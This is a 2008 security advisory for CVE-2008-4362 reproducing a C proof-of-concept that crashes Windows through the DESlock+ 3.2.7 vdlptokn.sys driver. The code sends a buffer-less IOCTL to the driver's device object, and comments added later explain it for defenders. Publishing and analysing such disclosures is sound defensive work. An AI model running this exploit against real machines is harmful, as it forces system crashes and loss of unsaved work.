
Topic :

DESlock+ 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit


SecurityAlert : 4341
CVE : CVE-2008-4362
CWE : CWE-399
SecurityRisk : Low
Remote Exploit : No
Local Exploit : Yes
Victim interaction required : No
Exploit Available : No
Credit : alex
Published : 03.10.2008

Affected Software : deslock:deslock:3.2.7



Advisory Content :

//////////////////////////////////////////////////////////////////////
// +--------------------------------------------------------------+ //
// |                                                              | //
// | Data Encryption Systems Ltd. - http://www.deslock.com/       | //
// | Data Encryption Systems DESlock+ - 3.2.7                     | //
// | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys      | //
// | DoS Exploit                                                  | //
// |                                                              | //
// +--------------------------------------------------------------+ //
// |                                                              | //
// | NT Internals - http://www.ntinternals.org/                   | //
// | alex ntinternals org                                         | //
// | 21 September 2008                                            | //
// |                                                              | //
// +--------------------------------------------------------------+ //
//////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

/* Declaration prefixes for the prototypes below: DLL import, stdcall
   calling convention, returning either VOID or NTSTATUS. */
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

/* Native API constants defined locally instead of coming from an SDK header. */
#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

/* NOTE(review): NTSTATUS is declared unsigned here, while the Windows SDK
   declares it as a signed LONG. main() only tests for non-zero, so
   informational and warning codes are also treated as failures. */
typedef ULONG NTSTATUS;

/*
 * Local declaration of the counted wide-string descriptor passed to the
 * Rtl* helpers and referenced from OBJECT_ATTRIBUTES.
 *
 * The offsets in the trailing comments are the ones recorded by the original
 * author; Buffer at 0x04 and a total size of 0x08 correspond to 4-byte
 * pointers, so the annotations describe a 32-bit build.
 */
typedef struct _UNICODE_STRING {
    USHORT Length;          /* 0x00 */
    USHORT MaximumLength;   /* 0x02 */
    PWSTR  Buffer;          /* 0x04 */
                            /* 0x08: end of structure */
} UNICODE_STRING, *PUNICODE_STRING, **PPUNICODE_STRING;

/*
 * Local declaration of the object-attributes record handed to NtCreateFile.
 * It carries the object name plus lookup flags and optional security data.
 *
 * Offsets are the original author's annotations and assume 4-byte handles
 * and pointers (total size 0x18), i.e. a 32-bit build.
 */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG                        Length;                    /* 0x00 */
    HANDLE                       RootDirectory;             /* 0x04 */
    PUNICODE_STRING              ObjectName;                /* 0x08 */
    ULONG                        Attributes;                /* 0x0C */
    PSECURITY_DESCRIPTOR         SecurityDescriptor;        /* 0x10 */
    PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;  /* 0x14 */
                                                            /* 0x18: end of structure */
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;

/*
 * Local declaration of the status record that NtCreateFile and
 * NtDeviceIoControlFile take as an OUT parameter.
 *
 * Status and Pointer share offset 0x00 through an anonymous union.
 * NOTE(review): Information is declared as ULONG and the annotated size is
 * 0x08, which only matches a 32-bit layout - confirm before building for
 * any other target.
 */
typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;    /* 0x00 */
        PVOID    Pointer;   /* 0x00 */
    };

    ULONG Information;      /* 0x04 */
                            /* 0x08: end of structure */
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK, **PPIO_STATUS_BLOCK;

/*
 * Pointer-to-callback type used for the ApcRoutine parameter of
 * NtDeviceIoControlFile. This listing only ever passes NULL for it.
 */
typedef VOID (NTAPI *PIO_APC_ROUTINE)(
    IN PVOID            ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG            Reserved
);

/*
 * Imported string helpers (normally exported by ntdll.dll; the import
 * library is not named in this listing).
 *
 * RtlInitUnicodeString fills DestinationString so that it describes
 * SourceString. RtlFreeUnicodeString releases the buffer of a string.
 * NOTE(review): the two are not a matched pair - main() calls the free
 * routine on a descriptor that was only initialised, not allocated.
 */
IMP_VOID RtlInitUnicodeString(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR              SourceString
);

IMP_VOID RtlFreeUnicodeString(
    IN PUNICODE_STRING UnicodeString
);

/*
 * Imported native call used by main() to open the device object named in
 * ObjectAttributes. The handle is returned through FileHandle and the
 * completion status through IoStatusBlock.
 */
IMP_SYSCALL NtCreateFile(
    OUT PHANDLE           FileHandle,
    IN ACCESS_MASK        DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK  IoStatusBlock,
    IN PLARGE_INTEGER     AllocationSize OPTIONAL,
    IN ULONG              FileAttributes,
    IN ULONG              ShareAccess,
    IN ULONG              CreateDisposition,
    IN ULONG              CreateOptions,
    IN PVOID              EaBuffer OPTIONAL,
    IN ULONG              EaLength
);

/*
 * Imported native call that sends a control code to the driver behind
 * FileHandle. Input and output buffers are both optional at this interface,
 * so the receiving driver has to validate pointers and lengths itself
 * before using them.
 */
IMP_SYSCALL NtDeviceIoControlFile(
    IN HANDLE            FileHandle,
    IN HANDLE            Event OPTIONAL,
    IN PIO_APC_ROUTINE   ApcRoutine OPTIONAL,
    IN PVOID             ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG             IoControlCode,
    IN PVOID             InputBuffer OPTIONAL,
    IN ULONG             InputBufferLength,
    OUT PVOID            OutputBuffer OPTIONAL,
    IN ULONG             OutputBufferLength
);

/* Imported native call that closes a handle obtained from NtCreateFile. */
IMP_SYSCALL NtClose(
    IN HANDLE Handle
);

/*
 * Imported native call that suspends the calling thread for Interval.
 * main() passes FALSE for Alertable on every call.
 */
IMP_SYSCALL NtDelayExecution(
    IN BOOLEAN        Alertable,
    IN PLARGE_INTEGER Interval
);

/*
 * Proof-of-concept entry point from the advisory (local denial of service,
 * listed on the page as CVE-2008-4362 / CWE-399).
 *
 * Visible sequence: print a banner, open \Device\DLPTokenWalter0 through
 * NtCreateFile with read and write data access, wait through four
 * NtDelayExecution calls, issue control code 0x002220C0 with no input or
 * output buffer, then close the handle.
 *
 * argc and argv are not used.
 *
 * Returns 0 when every call reports status 0, otherwise the first non-zero
 * NTSTATUS value, which becomes the process exit code.
 *
 * Defender notes: the whole trigger is one device open plus one buffer-less
 * IOCTL, so the defect lies in how vdlptokn.sys 1.0.2.43 handles that
 * request. Remediation is a vendor driver update (fixed version not stated
 * on this page). Hosts can be inventoried for the driver file and version
 * named in the banner; presumably a resulting crash dump would name
 * vdlptokn.sys - confirm against a real dump.
 *
 * NOTE(page): several lines below were wrapped by the page extraction (the
 * banner string and the parameter labels after the // markers); the text is
 * kept exactly as published.
 */
int __cdecl main(int argc, char **argv)
{
NTSTATUS NtStatus;

HANDLE DeviceHandle;

UNICODE_STRING DeviceName;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
LARGE_INTEGER Interval;


///////////////////////////////////////////////////////////////////////////
////////////////////

// Cosmetic only: clears the console through the shell, then prints the banner.
system("cls");

printf( "
+--------------------------------------------------------------------------
--+\n"
" |
|\n"
" | Data Encryption Systems Ltd. - http://www.deslock.com/
|\n"
" | Data Encryption Systems DESlock+ - 3.2.7
|\n"
" | DESlock+ Virtual Token Driver - 1.0.2.43 - vdlptokn.sys
|\n"
" | DoS Exploit
|\n"
" |
|\n"
"
+--------------------------------------------------------------------------
--+\n"
" |
|\n"
" | NT Internals - http://www.ntinternals.org/
|\n"
" | alex ntinternals org
|\n"
" | 21 September 2008
|\n"
" |
|\n"
"
+--------------------------------------------------------------------------
--+\n\n");


///////////////////////////////////////////////////////////////////////////
////////////////////

// Describe the device object to open. DeviceName points at the string
// literal; nothing is allocated for it here.
RtlInitUnicodeString(&DeviceName, L"\\Device\\DLPTokenWalter0");

// Plain attributes: no root directory, case-insensitive name lookup, no
// security descriptor and no quality-of-service record.
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
ObjectAttributes.RootDirectory = 0;
ObjectAttributes.ObjectName = &DeviceName;
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;


// Open the device for read and write data access with shared read and write.
// Each wrapped word under a // marker is the label of the argument above it.
NtStatus = NtCreateFile(
&DeviceHandle, //
FileHandle
FILE_READ_DATA | FILE_WRITE_DATA, //
DesiredAccess
&ObjectAttributes, //
ObjectAttributes
&IoStatusBlock, //
IoStatusBlock
NULL, //
AllocationSize OPTIONAL
0, //
FileAttributes
FILE_SHARE_READ | FILE_SHARE_WRITE, //
ShareAccess
FILE_OPEN_IF, //
CreateDisposition
0, //
CreateOptions
NULL, // EaBuffer
OPTIONAL
0); //
EaLength

// Any non-zero status is treated as failure. A failure here is the expected
// result on a host where the device object does not exist or is not
// accessible to the caller.
if(NtStatus)
{
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);
return NtStatus;
}

// NOTE(review): DeviceName was filled by RtlInitUnicodeString from a string
// literal and was never allocated in this function, so releasing it with
// RtlFreeUnicodeString looks mismatched - confirm.
RtlFreeUnicodeString(&DeviceName);


///////////////////////////////////////////////////////////////////////////
////////////////////

// 0xFFFFFFFFFF676980 is -10,000,000 as a signed 64-bit value. NtDelayExecution
// takes a negative interval as a relative delay in 100 ns units, so each of
// the four calls below waits one second.
Interval.LowPart = 0xFF676980;
Interval.HighPart = 0xFFFFFFFF;

// Countdown output. No fflush is issued, so the digits may appear late
// when stdout is buffered.
printf(" 3");
NtDelayExecution(FALSE, &Interval);

printf(" 2");
NtDelayExecution(FALSE, &Interval);

printf(" 1");
NtDelayExecution(FALSE, &Interval);

printf(" BSoD\n\n");
NtDelayExecution(FALSE, &Interval);


// Single request: control code 0x002220C0 with NULL input and output buffers
// and zero lengths. The listing prints BSoD immediately before this call, so
// the author expects the system to stop inside the driver at this point. A
// driver that validated buffer pointers and lengths for this code would be
// expected to fail the request with an error status instead.
NtStatus = NtDeviceIoControlFile(
DeviceHandle, // FileHandle
NULL, // Event
NULL, // ApcRoutine
NULL, // ApcContext
&IoStatusBlock, // IoStatusBlock
0x002220C0, // IoControlCode
NULL, // InputBuffer
0, // InputBufferLength
NULL, // OutputBuffer
0); // OutBufferLength

// NOTE(review): this early return leaves DeviceHandle open; NtClose is only
// reached on the success path.
if(NtStatus)
{
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n",
NtStatus);
return NtStatus;
}


///////////////////////////////////////////////////////////////////////////
////////////////////

// Reached only when the request returned status 0.
NtStatus = NtClose(DeviceHandle); // Handle

if(NtStatus)
{
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);
return NtStatus;
}

return 0;
}



References :

http://securityreason.com/expldownload/1/4739/1 (Exploit)
http://www.milw0rm.com/exploits/6515
http://www.frsirt.com/english/advisories/2008/2638
http://secunia.com/advisories/31921



